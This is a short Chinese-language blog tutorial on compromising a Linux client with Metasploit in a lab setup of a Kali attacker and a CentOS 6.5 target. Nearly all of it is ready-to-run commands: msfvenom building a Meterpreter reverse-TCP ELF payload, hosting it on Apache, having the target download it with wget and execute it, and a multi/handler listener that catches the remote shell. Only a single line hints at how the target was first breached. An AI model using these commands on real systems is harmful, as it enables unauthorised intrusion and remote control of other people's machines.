客户端渗透之——使用Metasploit实现对Linux客户端的渗透

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/l1028386804/article/details/86633254

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633254

攻击机 Kali 192.168.175.128

靶机 CentOS 6.5 192.168.175.132

1.生成elf文件

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.175.128 LPORT=5555 -f elf > /var/www/html/pay.elf

这里,我们将生成的pay.elf文件保存到了/var/www/html/目录下。

2.启动apache服务器

service apache2 start

3.在靶机上下载pay.elf

这里,假设我们经过一系列的渗透取得了靶机的权限,在靶机上执行如下命令

wget http://192.168.175.128/pay.elf
chmod a+x pay.elf
./pay.elf

4.在攻击机上执行攻击操作

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
setg LHOST 192.168.175.128
setg LPORT 5555
exploit

这样,我们就可以获取目标服务器的Meterpreter了。

猜你喜欢

转载自blog.csdn.net/l1028386804/article/details/86633254